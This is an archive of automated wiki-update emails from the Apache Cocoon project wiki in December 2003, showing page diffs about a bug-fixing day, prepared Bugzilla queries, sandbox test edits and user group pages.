FirstFridayDecember2003 CocoonUserGroupSwitzerland David Fri Dec 5 12:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 16 on Fri Dec 5 10:16:49 2003 by UnicoHommes + * Default exclusion of OJB block as described above has been fixed. Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupSwitzerland , version: 46 on Fri Dec 5 10:47:09 2003 by AndreasHartmann + *[AndreasHartmann] Page: http://wiki.cocoondev.org/Wiki.jsp?page=David , version: 3 on Fri Dec 5 10:15:34 2003 by ReinhardPoetz - [http://www.searchportal1.com/home-based-internet-business-opportunity.html] - [http://www.searchportal1.com/home-building.html] - From [email protected] Fri Dec 05 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99204 invoked from network); 5 Dec 2003 14:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 14:00:08 -0000 Received: (qmail 47103 invoked by uid 500); 5 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 46955 invoked by uid 500); 5 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46924 invoked from network); 5 Dec 2003 14:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 14:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5E02p17250 for <[email protected]>; Fri, 5 Dec 2003 15:00:03 +0100 Date: Fri, 5 Dec 2003 15:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Fri Dec 5 15:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 205 on Fri Dec 5 13:40:19 2003 by 161.129.204.104 + Do people put dirty links here + + + From [email protected] Fri Dec 05 15:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41195 invoked from network); 5 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 15:00:07 -0000 Received: (qmail 85263 invoked by uid 500); 5 Dec 2003 15:00:03 -0000 Delivered-To: [email protected] Received: (qmail 85220 invoked by uid 500); 5 Dec 2003 15:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85202 invoked from network); 5 Dec 2003 15:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 15:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5F03p17277 for <[email protected]>; Fri, 5 Dec 2003 16:00:03 +0100 Date: Fri, 5 Dec 2003 16:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Fri Dec 5 16:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 206 on Fri Dec 5 14:14:34 2003 by DavidCrossley - Dirty links usually don't live long here.. ? - + Dirty links usually don't live long here. - test - test2 - - Hello World! - - \\Comment - - Hello world2 - - Do people put dirty links here From [email protected] Fri Dec 05 16:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82089 invoked from network); 5 Dec 2003 16:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 16:00:08 -0000 Received: (qmail 45824 invoked by uid 500); 5 Dec 2003 16:00:03 -0000 Delivered-To: [email protected] Received: (qmail 45683 invoked by uid 500); 5 Dec 2003 16:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45667 invoked from network); 5 Dec 2003 16:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 16:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5G03p17304 for <[email protected]>; Fri, 5 Dec 2003 17:00:03 +0100 Date: Fri, 5 Dec 2003 17:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowWeUseBugzilla Fri Dec 5 17:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 14 on Fri Dec 5 15:34:52 2003 by ReinhardPoetz - *[all open Cocoon2 bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] (DC: Note that [this query|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substri! ng&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] from the FirstFriday front page gives 93 bugs instead of the 58) + *[all open Cocoon2 bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] (DC: Note that [this query|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substri! ng&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] from the FirstFriday front page gives 93 bugs instead of the 58) [RP|ReinhardPoetz]: the difference is that the first query doesn't include patches and enhancments, just bugs ;-) ? ! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From [email protected] Fri Dec 05 17:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16897 invoked from network); 5 Dec 2003 17:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 17:00:14 -0000 Received: (qmail 86439 invoked by uid 500); 5 Dec 2003 17:00:03 -0000 Delivered-To: [email protected] Received: (qmail 86400 invoked by uid 500); 5 Dec 2003 17:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86336 invoked from network); 5 Dec 2003 17:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 17:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5H04p17332 for <[email protected]>; Fri, 5 Dec 2003 18:00:04 +0100 Date: Fri, 5 Dec 2003 18:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerSimpleWebappOrganisation ServingStaticFiles Fri Dec 5 18:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerSimpleWebappOrganisation , version: 22 on Fri Dec 5 16:50:02 2003 by 161.129.204.104 - - DOCUMENT-STATUS: __*draft*__ reviewed released\\ + - DOCUMENT-STATUS: __*draft*_ _ reviewed released\\ ? + Page: http://wiki.cocoondev.org/Wiki.jsp?page=ServingStaticFiles , version: 11 on Fri Dec 5 16:36:27 2003 by 161.129.204.104 - * [Content Types and Subtypes as a list|http://www.nacs.uci.edu/indiv/ehood/MIME/MIME.html] + * [Content Types and Subtypes as a list|http://www.nacs.uci.edu/indiv/ehood/MIME/MIME.html] (link broken as of 5 Dec 2003) ? +++++++++++++++++++++++++++++++ From [email protected] Fri Dec 05 18:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49877 invoked from network); 5 Dec 2003 18:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 18:00:13 -0000 Received: (qmail 21870 invoked by uid 500); 5 Dec 2003 18:00:05 -0000 Delivered-To: [email protected] Received: (qmail 21806 invoked by uid 500); 5 Dec 2003 18:00:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21782 invoked from network); 5 Dec 2003 18:00:04 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 18:00:04 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5I07p17359 for <[email protected]>; Fri, 5 Dec 2003 19:00:07 +0100 Date: Fri, 5 Dec 2003 19:00:07 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFridayDecember2003 HowWeUseBugzilla BugzillaQueries Fri Dec 5 19:00:07 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 17 on Fri Dec 5 17:37:03 2003 by 161.129.204.104 + * At 5.30 PM GMT there were...93 bugs left. A new query in [BugzillaQueries] shows which bugs have been changed in the last two days (right now: not many). Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 17 on Fri Dec 5 17:32:35 2003 by 161.129.204.104 + Note that there are some prepared [BugzillaQueries] ready for your to enjoy. - !!!Query bugzilla - Here are a few __standard__ queries for everyday use: - - *[all open Cocoon2 bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] (DC: Note that [this query|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substri! ng&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] from the FirstFriday front page gives 93 bugs instead of the 58) [RP|ReinhardPoetz]: the difference is that the first query doesn't include patches and enhancments, just bugs ;-) - *[all provided patches|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&bug_severity=Enhancement&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=substring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] - * Bugs changed in the [last two days|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=2&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] - * CocoonForms roadmap (using bugzilla dependencies to group issues together): - ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] - **[CocoonForms 1.0 - Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25110] - all issues necessary for the first stable release of CocoonForms - **[CocoonForms - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25113] - all issues NOT necessary for the next (=first) release of CocoonForms - *[all assigned bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=assigned_to&type0-0-0=notequals&value0-0-0=dev%40cocoon.apache.org&cmdtype=doit&order=Reuse+same+sort+as+last+time] - we should check them regularly (especially if they are assigned to non-committers) if the assigned person continues to work on it - *[add a new issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?product=Cocoon%202] - direct link to enter a new issue into Bugzilla Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 1 on Fri Dec 5 17:31:03 2003 by 161.129.204.104 New page created: + Here are a few __standard__ queries for everyday use: + + !! Lists of bugs + * Open Cocoon2 bugs: [bugs only|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] , [all issues|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&em! ailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] (the first query doesn't include patches and enhancements, only bugs) + *[all provided patches|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&bug_severity=Enhancement&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=substring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] + * Bugs changed in the [last two days|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&bug_status=VERIFIED&bug_status=CLOSED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=2&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=Cocoon14&newqueryname=&order=%27Importance%27] + + !! CocoonForms + * CocoonForms roadmap (using bugzilla dependencies to group issues together): + ** [Overview|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25099] + **[CocoonForms 1.0 - Roadmap|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25110] - all issues necessary for the first stable release of CocoonForms + **[CocoonForms - future releases|http://nagoya.apache.org/bugzilla/showdependencytree.cgi?id=25113] - all issues NOT necessary for the next (=first) release of CocoonForms + *[all assigned bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=assigned_to&type0-0-0=notequals&value0-0-0=dev%40cocoon.apache.org&cmdtype=doit&order=Reuse+same+sort+as+last+time] - we should check them regularly (especially if they are assigned to non-committers) if the assigned person continues to work on it + + !! Utilities + *[add a new issue|http://nagoya.apache.org/bugzilla/enter_bug.cgi?product=Cocoon%202] - direct link to enter a new issue into Bugzilla. + From [email protected] Fri Dec 05 21:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58688 invoked from network); 5 Dec 2003 21:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 21:00:11 -0000 Received: (qmail 20558 invoked by uid 500); 5 Dec 2003 20:59:59 -0000 Delivered-To: [email protected] Received: (qmail 20529 invoked by uid 500); 5 Dec 2003 20:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20518 invoked from network); 5 Dec 2003 20:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 20:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5L03p17440 for <[email protected]>; Fri, 5 Dec 2003 22:00:03 +0100 Date: Fri, 5 Dec 2003 22:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] DavidLegg CocoonUserGroupLondon Fri Dec 5 22:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=DavidLegg , version: 3 on Fri Dec 5 20:53:39 2003 by DavidLegg - __Not long to go now!...__ - Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupLondon , version: 6 on Fri Dec 5 20:52:20 2003 by DavidLegg + [David Legg|DavidLegg]\\ From [email protected] Fri Dec 05 23:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4700 invoked from network); 5 Dec 2003 23:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 23:00:13 -0000 Received: (qmail 84382 invoked by uid 500); 5 Dec 2003 23:00:00 -0000 Delivered-To: [email protected] Received: (qmail 84249 invoked by uid 500); 5 Dec 2003 22:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84233 invoked from network); 5 Dec 2003 22:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 22:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5N04p17491 for <[email protected]>; Sat, 6 Dec 2003 00:00:04 +0100 Date: Sat, 6 Dec 2003 00:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BugzillaQueries Sat Dec 6 00:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BugzillaQueries , version: 2 on Fri Dec 5 22:55:18 2003 by BertrandDelacretaz + *[all assigned bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=assigned_to&type0-0-0=notequals&value0-0-0=dev%40cocoon.apache.org&cmdtype=doit&order=Reuse+same+sort+as+last+time] - we should check them regularly (especially if they are assigned to non-committers) if the assigned person continues to work on it - *[all assigned bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=assigned_to&type0-0-0=notequals&value0-0-0=dev%40cocoon.apache.org&cmdtype=doit&order=Reuse+same+sort+as+last+time] - we should check them regularly (especially if they are assigned to non-committers) if the assigned person continues to work on it From [email protected] Sat Dec 06 01:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50233 invoked from network); 6 Dec 2003 01:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 6 Dec 2003 01:00:17 -0000 Received: (qmail 49894 invoked by uid 500); 6 Dec 2003 01:00:01 -0000 Delivered-To: [email protected] Received: (qmail 49875 invoked by uid 500); 6 Dec 2003 01:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49861 invoked from network); 6 Dec 2003 01:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 6 Dec 2003 01:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB6107p17549 for <[email protected]>; Sat, 6 Dec 2003 02:00:08 +0100 Date: Sat, 6 Dec 2003 02:00:08 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerSimpleWebappOrganisation FirstFriday PHPGenerator HowWeUseBugzilla FirstFridayDecember2003 Sat Dec 6 02:00:07 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerSimpleWebappOrganisation , version: 23 on Sat Dec 6 00:24:48 2003 by DavidCrossley - - DOCUMENT-STATUS: __*draft*_ _ reviewed released\\ ? - + - DOCUMENT-STATUS: __*draft*__ reviewed released\\ 